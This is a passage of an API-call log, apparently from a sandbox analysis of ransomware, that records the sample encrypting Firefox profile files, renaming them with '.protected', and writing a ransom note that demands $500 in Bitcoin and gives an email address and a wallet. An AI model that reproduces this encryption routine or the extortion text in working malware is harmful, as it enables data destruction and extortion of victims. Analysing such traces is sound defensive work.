HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\bookmarkbackups\\*", lpFindFileData=0x295e2f0 | out: lpFindFileData=0x295e2f0) returned 0x47bb10 [0090.482] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0090.482] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0090.482] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0090.482] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0090.482] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0090.482] wnsprintfW (in: pszDest=0x503c40, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\bookmarkbackups\\.") returned 109 [0090.482] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0090.482] FindNextFileW (in: hFindFile=0x47bb10, lpFindFileData=0x295e2f0 | out: lpFindFileData=0x295e2f0) returned 1 [0090.482] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0090.482] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0090.482] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0090.482] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0090.482] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0090.482] wnsprintfW (in: pszDest=0x503c40, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\bookmarkbackups\\..") returned 110 [0090.482] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0090.482] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0090.482] FindNextFileW (in: hFindFile=0x47bb10, lpFindFileData=0x295e2f0 | out: lpFindFileData=0x295e2f0) returned 1 [0090.482] lstrcmpiW (lpString1="bookmarks-2017-06-05_5.json", lpString2="Windows") returned -1 [0090.482] lstrcmpiW (lpString1="bookmarks-2017-06-05_5.json", lpString2="Program Files") returned -1 [0090.482] lstrcmpiW (lpString1="bookmarks-2017-06-05_5.json", lpString2="Program Files (x86)") returned -1 [0090.482] lstrcmpiW (lpString1="bookmarks-2017-06-05_5.json", lpString2="$Recycle.bin") returned 1 [0090.482] lstrcmpiW (lpString1="bookmarks-2017-06-05_5.json", lpString2="System Volume Information") returned -1 [0090.482] wnsprintfW (in: pszDest=0x503c40, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\bookmarkbackups\\bookmarks-2017-06-05_5.json") returned 135 [0090.482] StrStrIW (lpFirst="bookmarks-2017-06-05_5.json", lpSrch=".protected") returned 0x0 [0090.482] lstrcmpW (lpString1="bookmarks-2017-06-05_5.json", lpString2="RESTORE_FILES.txt") returned -1 [0090.482] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e28c | out: pbBuffer=0x295e28c) returned 1 [0090.483] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e2b4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e2b4*=0x30) returned 1 [0090.483] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\bookmarkbackups\\bookmarks-2017-06-05_5.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\bookmarkbackups\\bookmarks-2017-06-05_5.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0090.484] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\bookmarkbackups\\bookmarks-2017-06-05_5.json") returned 135 [0090.484] StrStrW (lpFirst="bookmarks-2017-06-05_5.json", lpSrch=".txt") returned 0x0 [0090.484] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\bookmarkbackups\\bookmarks-2017-06-05_5.json") returned 135 [0090.484] StrStrW (lpFirst="bookmarks-2017-06-05_5.json", lpSrch=".rar") returned 0x0 [0090.484] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\bookmarkbackups\\bookmarks-2017-06-05_5.json") returned 135 [0090.484] StrStrW (lpFirst="bookmarks-2017-06-05_5.json", lpSrch=".zip") returned 0x0 [0090.484] ReadFile (in: hFile=0x158, lpBuffer=0x513c88, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x513c88*, lpNumberOfBytesRead=0x295e2d4*=0xbdb, lpOverlapped=0x0) returned 1 [0090.522] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xfffff425, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0090.522] WriteFile (in: hFile=0x158, lpBuffer=0x513c88*, nNumberOfBytesToWrite=0xbdb, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x513c88*, lpNumberOfBytesWritten=0x295e2d4*=0xbdb, lpOverlapped=0x0) returned 1 [0090.522] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0090.522] WriteFile (in: hFile=0x158, lpBuffer=0x295e2ac*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x295e2ac*, lpNumberOfBytesWritten=0x295e2d4*=0x4, lpOverlapped=0x0) returned 1 [0090.523] WriteFile (in: hFile=0x158, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e2d4*=0x30, lpOverlapped=0x0) returned 1 [0090.523] CloseHandle (hObject=0x158) returned 1 [0090.523] wnsprintfW (in: pszDest=0x513c88, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\bookmarkbackups\\bookmarks-2017-06-05_5.json.protected") returned 145 [0090.523] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\bookmarkbackups\\bookmarks-2017-06-05_5.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\bookmarkbackups\\bookmarks-2017-06-05_5.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\bookmarkbackups\\bookmarks-2017-06-05_5.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\bookmarkbackups\\bookmarks-2017-06-05_5.json.protected")) returned 1 [0090.525] FindNextFileW (in: hFindFile=0x47bb10, lpFindFileData=0x295e2f0 | out: lpFindFileData=0x295e2f0) returned 1 [0090.525] lstrcmpiW (lpString1="bookmarks-2017-06-16_5.json", lpString2="Windows") returned -1 [0090.525] lstrcmpiW (lpString1="bookmarks-2017-06-16_5.json", lpString2="Program Files") returned -1 [0090.525] lstrcmpiW (lpString1="bookmarks-2017-06-16_5.json", lpString2="Program Files (x86)") returned -1 [0090.525] lstrcmpiW (lpString1="bookmarks-2017-06-16_5.json", lpString2="$Recycle.bin") returned 1 [0090.525] lstrcmpiW (lpString1="bookmarks-2017-06-16_5.json", lpString2="System Volume Information") returned -1 [0090.525] wnsprintfW (in: pszDest=0x503c40, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\bookmarkbackups\\bookmarks-2017-06-16_5.json") returned 135 [0090.525] StrStrIW (lpFirst="bookmarks-2017-06-16_5.json", lpSrch=".protected") returned 0x0 [0090.525] lstrcmpW (lpString1="bookmarks-2017-06-16_5.json", lpString2="RESTORE_FILES.txt") returned -1 [0090.525] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e28c | out: pbBuffer=0x295e28c) returned 1 [0090.525] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e2b4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e2b4*=0x30) returned 1 [0090.525] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\bookmarkbackups\\bookmarks-2017-06-16_5.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\bookmarkbackups\\bookmarks-2017-06-16_5.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0090.526] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\bookmarkbackups\\bookmarks-2017-06-16_5.json") returned 135 [0090.526] StrStrW (lpFirst="bookmarks-2017-06-16_5.json", lpSrch=".txt") returned 0x0 [0090.526] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\bookmarkbackups\\bookmarks-2017-06-16_5.json") returned 135 [0090.526] StrStrW (lpFirst="bookmarks-2017-06-16_5.json", lpSrch=".rar") returned 0x0 [0090.526] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\bookmarkbackups\\bookmarks-2017-06-16_5.json") returned 135 [0090.526] StrStrW (lpFirst="bookmarks-2017-06-16_5.json", lpSrch=".zip") returned 0x0 [0090.526] ReadFile (in: hFile=0x158, lpBuffer=0x513c88, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x513c88*, lpNumberOfBytesRead=0x295e2d4*=0xbdb, lpOverlapped=0x0) returned 1 [0090.528] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xfffff425, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0090.528] WriteFile (in: hFile=0x158, lpBuffer=0x513c88*, nNumberOfBytesToWrite=0xbdb, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x513c88*, lpNumberOfBytesWritten=0x295e2d4*=0xbdb, lpOverlapped=0x0) returned 1 [0090.528] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0090.528] WriteFile (in: hFile=0x158, lpBuffer=0x295e2ac*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x295e2ac*, lpNumberOfBytesWritten=0x295e2d4*=0x4, lpOverlapped=0x0) returned 1 [0090.528] WriteFile (in: hFile=0x158, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e2d4*=0x30, lpOverlapped=0x0) returned 1 [0090.529] CloseHandle (hObject=0x158) returned 1 [0090.529] wnsprintfW (in: pszDest=0x513c88, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\bookmarkbackups\\bookmarks-2017-06-16_5.json.protected") returned 145 [0090.529] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\bookmarkbackups\\bookmarks-2017-06-16_5.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\bookmarkbackups\\bookmarks-2017-06-16_5.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\bookmarkbackups\\bookmarks-2017-06-16_5.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\bookmarkbackups\\bookmarks-2017-06-16_5.json.protected")) returned 1 [0090.529] FindNextFileW (in: hFindFile=0x47bb10, lpFindFileData=0x295e2f0 | out: lpFindFileData=0x295e2f0) returned 0 [0090.529] FindClose (in: hFindFile=0x47bb10 | out: hFindFile=0x47bb10) returned 1 [0090.529] wnsprintfW (in: pszDest=0x503c40, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\bookmarkbackups\\RESTORE_FILES.txt") returned 125 [0090.529] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\bookmarkbackups\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\bookmarkbackups\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x154 [0090.530] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0090.530] WriteFile (in: hFile=0x154, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295e2d4*=0x53d, lpOverlapped=0x0) returned 1 [0090.531] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0090.531] WriteFile (in: hFile=0x154, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295e2d4*=0x2ac, lpOverlapped=0x0) returned 1 [0090.531] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0090.531] WriteFile (in: hFile=0x154, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295e2d4*=0xb1, lpOverlapped=0x0) returned 1 [0090.531] CloseHandle (hObject=0x154) returned 1 [0090.531] FindNextFileW (in: hFindFile=0x47bad0, lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 1 [0090.531] lstrcmpiW (lpString1="cert8.db", lpString2="Windows") returned -1 [0090.531] lstrcmpiW (lpString1="cert8.db", lpString2="Program Files") returned -1 [0090.531] lstrcmpiW (lpString1="cert8.db", lpString2="Program Files (x86)") returned -1 [0090.531] lstrcmpiW (lpString1="cert8.db", lpString2="$Recycle.bin") returned 1 [0090.531] lstrcmpiW (lpString1="cert8.db", lpString2="System Volume Information") returned -1 [0090.531] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\cert8.db") returned 100 [0090.531] StrStrIW (lpFirst="cert8.db", lpSrch=".protected") returned 0x0 [0090.531] lstrcmpW (lpString1="cert8.db", lpString2="RESTORE_FILES.txt") returned -1 [0090.532] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e4fc | out: pbBuffer=0x295e4fc) returned 1 [0090.532] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e524*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e524*=0x30) returned 1 [0090.532] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\cert8.db" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\cert8.db"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x154 [0090.532] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\cert8.db") returned 100 [0090.532] StrStrW (lpFirst="cert8.db", lpSrch=".txt") returned 0x0 [0090.532] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\cert8.db") returned 100 [0090.532] StrStrW (lpFirst="cert8.db", lpSrch=".rar") returned 0x0 [0090.532] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\cert8.db") returned 100 [0090.532] StrStrW (lpFirst="cert8.db", lpSrch=".zip") returned 0x0 [0090.533] ReadFile (in: hFile=0x154, lpBuffer=0x503c40, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x503c40*, lpNumberOfBytesRead=0x295e544*=0x2800, lpOverlapped=0x0) returned 1 [0090.534] SetFilePointerEx (in: hFile=0x154, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0090.534] WriteFile (in: hFile=0x154, lpBuffer=0x503c40*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x503c40*, lpNumberOfBytesWritten=0x295e544*=0x2800, lpOverlapped=0x0) returned 1 [0090.534] SetFilePointerEx (in: hFile=0x154, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0090.534] WriteFile (in: hFile=0x154, lpBuffer=0x295e51c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x295e51c*, lpNumberOfBytesWritten=0x295e544*=0x4, lpOverlapped=0x0) returned 1 [0090.535] WriteFile (in: hFile=0x154, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e544*=0x30, lpOverlapped=0x0) returned 1 [0090.535] CloseHandle (hObject=0x154) returned 1 [0090.537] wnsprintfW (in: pszDest=0x503c40, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\cert8.db.protected") returned 110 [0090.537] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\cert8.db" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\cert8.db"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\cert8.db.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\cert8.db.protected")) returned 1 [0090.538] FindNextFileW (in: hFindFile=0x47bad0, lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 1 [0090.538] lstrcmpiW (lpString1="compatibility.ini", lpString2="Windows") returned -1 [0090.538] lstrcmpiW (lpString1="compatibility.ini", lpString2="Program Files") returned -1 [0090.538] lstrcmpiW (lpString1="compatibility.ini", lpString2="Program Files (x86)") returned -1 [0090.538] lstrcmpiW (lpString1="compatibility.ini", lpString2="$Recycle.bin") returned 1 [0090.538] lstrcmpiW (lpString1="compatibility.ini", lpString2="System Volume Information") returned -1 [0090.538] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\compatibility.ini") returned 109 [0090.538] StrStrIW (lpFirst="compatibility.ini", lpSrch=".protected") returned 0x0 [0090.538] lstrcmpW (lpString1="compatibility.ini", lpString2="RESTORE_FILES.txt") returned -1 [0090.539] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e4fc | out: pbBuffer=0x295e4fc) returned 1 [0090.539] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e524*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e524*=0x30) returned 1 [0090.539] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\compatibility.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\compatibility.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x154 [0090.539] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\compatibility.ini") returned 109 [0090.539] StrStrW (lpFirst="compatibility.ini", lpSrch=".txt") returned 0x0 [0090.539] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\compatibility.ini") returned 109 [0090.539] StrStrW (lpFirst="compatibility.ini", lpSrch=".rar") returned 0x0 [0090.539] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\compatibility.ini") returned 109 [0090.539] StrStrW (lpFirst="compatibility.ini", lpSrch=".zip") returned 0x0 [0090.539] ReadFile (in: hFile=0x154, lpBuffer=0x503c40, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x503c40*, lpNumberOfBytesRead=0x295e544*=0xce, lpOverlapped=0x0) returned 1 [0090.540] SetFilePointerEx (in: hFile=0x154, liDistanceToMove=0xffffff32, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0090.540] WriteFile (in: hFile=0x154, lpBuffer=0x503c40*, nNumberOfBytesToWrite=0xce, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x503c40*, lpNumberOfBytesWritten=0x295e544*=0xce, lpOverlapped=0x0) returned 1 [0090.540] SetFilePointerEx (in: hFile=0x154, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0090.540] WriteFile (in: hFile=0x154, lpBuffer=0x295e51c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x295e51c*, lpNumberOfBytesWritten=0x295e544*=0x4, lpOverlapped=0x0) returned 1 [0090.541] WriteFile (in: hFile=0x154, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e544*=0x30, lpOverlapped=0x0) returned 1 [0090.541] CloseHandle (hObject=0x154) returned 1 [0090.541] wnsprintfW (in: pszDest=0x503c40, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\compatibility.ini.protected") returned 119 [0090.541] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\compatibility.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\compatibility.ini"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\compatibility.ini.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\compatibility.ini.protected")) returned 1 [0090.542] FindNextFileW (in: hFindFile=0x47bad0, lpFindFileData=0x295e560 | out: 